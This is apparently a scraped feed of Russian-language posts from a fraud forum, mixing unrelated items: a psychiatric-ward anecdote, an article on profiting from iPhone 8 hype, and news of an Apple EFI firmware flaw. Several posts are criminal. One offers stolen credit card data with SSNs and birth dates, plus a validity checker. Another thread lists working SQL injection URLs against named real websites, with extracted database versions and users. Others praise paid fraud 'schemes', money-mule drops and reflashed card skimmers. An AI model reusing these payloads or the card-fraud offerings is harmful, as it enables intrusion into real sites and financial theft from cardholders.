удивить никого. Бьют ли пациентов? Бьют. Но просто так — никогда, слишком страшно им уподобиться. Чаще из самообороны. Страшно подумать, что было бы с моей головой, если бы я растерялся, когда очередной «белочник» схватил бутылку физраствора и пытался ею меня прибить. Как-то раз меня чуть не настигла смерть от удушья, когда 150 килограмм живого веса швырнуло меня на панцирную сетку кровати и увалилось сверху. Через пару дней я еле вынул его из петли в туалете. Ржавый бачок времен Наполеона умудрился это выдержать. Верить нельзя никому. Вообще. Никогда. Нельзя за чистую монету принимать слезливые истории о бедной маме, которая не видела сыночка много лет. Скорее всего эта «мама» пришла, чтобы по-свойски «подбодрить» своего «сыночка». Самое распространенное наказание — перевод с общего режима обратно в интенсивную терапию. Ну и все прилагающееся: нужные лекарства, вязки, отсутствие передач, записок, табака и т. д.
-
1 баллПрикольно, только напряжно, хотя думаю по 5к в день можно иметь, только надо быть онлайн постоянно
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллСхема достойная, своих денег точно стоит, окупаемость 3 дня, ничего сложного для себя я не нашел Спасибо)
-
1 баллВоспользовался , на свой страх и риск работал через гаранта Но все же работу ТС выполнил без каких либо проблем и задержек указанного срока, спасибос
-
1 баллбро я те уже в тг писал спс но тут тоже нужно что бы отзывов больше было! заказывал себе практически все состовляющие ПК пришло все в один день курьером я счастлив о таком железе за такие деньги я только мечтать мог
-
1 баллМожно любить или не любить продукцию компании Apple, но все равно нужно признать тот факт, что «яблочные» гаджеты пользуются невероятной популярностью во всем мире. И такое положение дел, скорее всего, сохранится в ближайшие годы. Компания Apple за время своего существования создать целую армию фанатов своих продуктов. И эта армия неуклонно растет, принося сотни миллионов продаж и миллиарды прибыли. Но не только корпорация Apple зарабатывает хорошие деньги на выпуске различных электронных устройств. Многочисленные предприниматели по всему миру уже давно рассмотрели перспективы развития собственного бизнеса при помощи продукции «яблочников». Сегодня мы расскажем о том, как предприимчивые граждане зарабатывают на любви других к продуктам Apple вообще, и на ажиотаже, связанном с выходом нового IPhone. Изготовление аксессуаров для IPhone 8 Сегодня просто невозможно зайти в магазин (или интернет-магазин) электроники и не увидеть предложение самых разнообразных аксессуаров для IPhone, IPod, IPad. Среди покупателей успехом пользуются не только сами устройства, но и разнообразные дополнения к ним. Наиболее популярными являются всевозможные защитные пленки, наклейки для корпуса, чехлы. Изготовление этих аксессуаров не требует от производителя каких-то особенных знаний и умений. Нужно только знать размеры устройства, для которого изготавливается наклейка или чехол. Самое приятное в этом деле то, что начать зарабатывать на продаже аксессуаров можно еще до начала продаж устройства. Невероятный ажиотаж, который сопровождает выход любой новинки от Apple, играет на руку самым предприимчивым и быстрым бизнесменам. Они успевают организовать продажи в период, когда на рынке еще нет, или практически нет, конкурентов. Яркий пример – изготовление чехлов для IPhone 8. 18 сентября состоялась презентация нового телефона от Apple. Продажи IPhone 8 стартуют где то в ноябре. Магазины ждут поступление новинки на прилавки. Большая часть производителей аксессуаров ждут старт продаж IPhone 8. А самые предприимчивые бизнесмены уже зарабатывают на этом долгожданном событии. Например, даже сегодня – за неделю до официальной даты начала продаж – в большинстве интернет-магазинов невозможно найти чехол для Apple IPhone 8. Да что там говорить, практически нигде нет чехлов для восьмого Айфона. Хотя соответствующий раздел уже имеется во всех магазинах электроники. Это касается не только чехлов, но и других аксессуаров. Почему абсолютное большинство производителей до сих пор не воспользовались ситуацией остается загадкой. Ведь эти девять дней – между официальной премьерой и началом продаж – идеальный период для входа на рынок. Даже новичок имеет возможность организовать быстрые продажи и практически мгновенно получить существенную прибыль. Конкурентов практически нет, ажиотаж вокруг выхода IPhone 8 просто запредельный, размеры устройства известны. То есть все для того, чтобы взять быстрый и уверенный старт. Даже крупные компании и специалисты не обходят стороной подобные события. Например, лондонский дизайнер Лара Боинк разработала дизайн эксклюзивных чехлов для IPhone 8, а компания CalypsoCrystal из Словении изготовила эти аксессуары. Каждый из трех дизайнов отличается по цвету и материалам отделки. Стоимость новинки 190 долларов. Не так уж и много, учитывая то, что при изготовлении используется серебро, титан и дорогая итальянская кожа. Разработка приложений для IPhone 8 Выход нового устройства Apple – это отличная возможность быстрого заработка и для разработчиков приложений. Тем более тогда, когда новый гаджет оснащается новым экраном и более мощным процессором. Конкуренции еще нет, а спрос начнет неуклонно расти уже с завтрашнего дня. Так что – самое время задуматься над разработкой игр и полезных программ для IPhone 8. Даже если вы не являетесь программистом и дизайнером, вы всегда можете найти и нанять нужных специалистов. Лучше всего искать разработчиков на биржах фриланса. Здесь всегда можно найти опытных мастеров, готовых выполнить поставленную задачу в кратчайший срок и за минимальные деньги. От вас требуется только одно – уникальная идея нового приложения, которое будет пользоваться успехом среди пользователей App Store (магазин приложений для Apple). Чем быстрее вашу светлую голову посетит гениальная идея, тем меньше шансов, что вас опередят конкуренты. Ведь когда дело касается выхода на рынок новых устройств от Apple, действовать нужно оперативно. Еще один, довольно необычный, способ заработка на выходе IPhone 8 Нужно сказать, что данный вариант обогащения будет работать всегда, когда дело касается повышенного ажиотажа перед началом продаж чего-либо (и необязательно, чтобы продукты был «яблочным»). Начала продаж IPhone 8 ждут многочисленные фанаты по всему. Люди собирают все свои сбережения, чтобы приобрести очередной «яблочный» гаджет по предзаказу. Они готовы на все, чтобы оказаться в числе первых покупателей нового телефона. Но самое невообразимое творится у главного магазина Apple в Нью-Йорке. По словам очевидцев, люди начали покидать свои дома и выстраиваться в очередь…. За неделю до начала продаж IPhone 8. Они берут с собой спальные мешки, запасаются едой и водой, чтобы не потерять свое место в очереди. Но далеко не все преследуют цель – первыми приобрести новый гаджет. Многие занимают места в очереди с целью их последующей продажи настоящим фанатам Apple, которые готовы покупать места в очереди по 100, 500 и даже по 1000 долларов. Все эти примеры говорят о том, что бизнес на ажиотаже перед выходом очередной новинки является сверхприбыльным. Первыми покупателями управляют не логика и здравый смысл, а только лишь их эмоции. Именно они заставляют переплачивать огромные деньги, в надежде стать одним из первых покупателей устройства и аксессуаров к нему.
-
1 балл
-
1 баллНа этом форуме продаются такие приколюхи , а вы учите как на них не вестись ?)
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллВ персональных компьютерах производства Apple обнаружена новая дыра , эксплуатация которой позволяет злоумышленникам перепрошивать устройства, помещая вредоносы непосредственно в EFI. Как выяснил специалист по информационной безопасности Педро Вилака (Pedro Vilaca), в компьютерах фирмы Apple, выпущенных до середины 2014 года, содержится уязвимость, позволяющая злоумышленнику внедрить в прошивку вредоносный код. Удалить этот код очень сложно, более того, он практически не детектируется антивирусами. Компьютеры содержат встроенное ПО (прошивку), которое управляет процессом загрузки, а затем передает контроль операционной системе. Как правило, эту прошивку называют BIOS по аналогии с названием ее старых реализаций, хотя более современная версия прошивки носит название UEFI (unified extensible firmware interface). Вилака заметил, что единый интерфейс EFI позволяет проводить манипуляции с ним. Обычно код EFI скрыт от пользователей, однако при выходе компьютера из спящего режима почему-то отключается FLOCKDN — защита EFI от доступа приложений из пространства пользователя. Это позволяет злоумышленнику с легкостью внедрить в EFI вредоносный код. Для того чтобы снять защиту, потребуется всего лишь перевести компьютер в спящий режим и затем вывести из него. При этом переустановка системы и даже замена винчестера вернуться к исходному состоянию EFI не помогут. Исследователь протестировал метод атаки на моделях MacBook Pro Retina, MacBook Pro 8.2 и MacBook Air, выпущенных до середины 2014 года. На всех компьютерах была установлена последняя версия прошивки, и все они оказались уязвимыми. Эксперт оповестил о проблеме руководство Apple, однако компания пока никак не отреагировала на ситуацию. Это не первый случай, когда специалисты сообщают о возможности модифицирования прошивки «яблочных» ПК. В декабре прошлого года программист Трэммэл Хадсон (Trammell Hudson) сообщил о дыре в прошивке Apple EFI, позволяющей установить вредоносное ПО в ПЗУ начальной загрузки популярных ноутбуков MacBook.
-
1 баллПредлагаю СС разных стран для продажи В наличии имеются с основном основные страны европы и юса в больших количествах. Цены от 3$ При проверке валидности моим чекером + 0,3$ к стоимости. Если чек показал, что карта не валид, то чек бесплатный. При желании покупателя можем проверить карту на PayPal и VBV/MCSC(обращаться по контатам). Поиск и сортировка бесплатно. Возможен поиск по стране, штату, городу и Бинам. формат СС BIN EXP NAME AVS COUNTRY TYPE STATE CITY ZIP SSN DOB BASE
-
1 балл
-
1 балл
-
1 баллЯ выступаю в роли гаранта,т.е схемы не я придумываю.Перед продажей мы все проверяем на работоспособность и выхлоп.Сомнений не должно у вас возникать если прочитаете правила.Если вы не получаете выхлоп то я верну вам деньги,а сам автор не получает денежку!
-
1 балл
-
1 баллМдя... Никогда не думал, что тема про баню таким тесным образом может переплестись с астрологией. Мож посоветовать моему товарищу открыть астрологическую баню, или на худой конец планетарий?
-
1 баллОк! но с дикими зверями думающими и принимающими свои решения агрессивно жестко по американски с твердолобым мышлением ковбоя за баблом иначе никак ни-з-зя-я! съедят! однако )))) а вот с теми, кто умеет шевелить своми мозгами и старается взять в конкретном месте столько, чтобы и сил хватило унести и успех был в итоге, я крайне предупредителен и вежлив и терпелив, но я вовсе не обязан быть для всех воспитателем детсткого садика ))) наоборот, считаю себя, по своим способностям и опыту фронтовым хирургом... который по долгу службы общается с тяжело раненными, и тут не до веждивых приседаний с вареньем в ложечке и ленивых танцев на паркете, времени нет на сладенькие улыбки и чмоки...с точками и запятыми... ну а если потом у клиента, даже, после и болезненной оперции и реанимации его возможностей и мышления, будет упрямое желание таки себя обанкротить своими глупыми решениями, ну так это уже к психиатру пл-и-из! вот он и будет для упетрых и самовлюбленных пациентов американского разлива самым вежливым и терпеливым! теперь понятно?
-
1 балл
-
1 баллВаляется уже пол года, использовался 2 раза состояние нового В комплекте 500 золотых болванок Отправка любым удобным способом отдам все за 10000р
-
1 балл
-
1 баллВыкладываем в этой теме найденые SQL иньекции. Раскручиваем скулю до версии мускуля бд и юзера. Можно сразу на вывод определенной инфы. Пример: http://www.anonym.to/?http://www.interp ... t(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- Version:5.0.77 Database:interplay user:interplay@localhost Иньекции такого вида не нужны будут удаляться. http://site.com/news.php?id=4' ........................................................................................................................................ http://bpsca.co.uk/products.php?id=132- ... t(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12-- Version:5.1.56-community-log Database:web231-website-1 User:web231-website-1@79.170.40.231 ........................................................................................................................................ http://newportrestaurantgroup.com/press ... t(version(),0x3a,database(),0x3a,user()),5,6,7-- Version:5.0.51a Database:newporth_NHCSync User:newporth_blackst@81-185-38-208.tpa.kgix.net ........................................................................................................................................ http://newagestudios.co.uk/serviceinfo. ... t(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- Version:5.0.45-community-nt Database:newagestudios User:newagestudios@localhost ........................................................................................................................................ http://naturalpaving.co.uk/page.php?id= ... ,(version(),0x3a,database(),0x3a,user()),4,5,6,7,8-- Version:5.0.77-log Database:naturalpdb User:npvadmin@server213-171-218-185.livedns.org.uk Ковыряйте глядиш че нужного вам найдете
-
1 балл
-
1 баллобщался с человеком, он продает эти устройства, перепрошивать нужно 100%, так как на стандартной прошивке половина инфы будет скрыто звездочками. Прошивку можно расковырять в настройках безопасности все можно снять, но это не так просто.
-
1 балл
-
1 баллодин из вариантов.. что мог дроп сделать - прости придти.. обложить всех херами и закрыть счёт..)) ему бабки должны были .. просто отдать.. и всё)) Посмотрим.. что Иноле раскажет..))
-
1 балл
-
1 балл
-
1 баллсо своей стороны могу предложить помощь в инфе не из паблик баз...неужели не кто не сталкивался?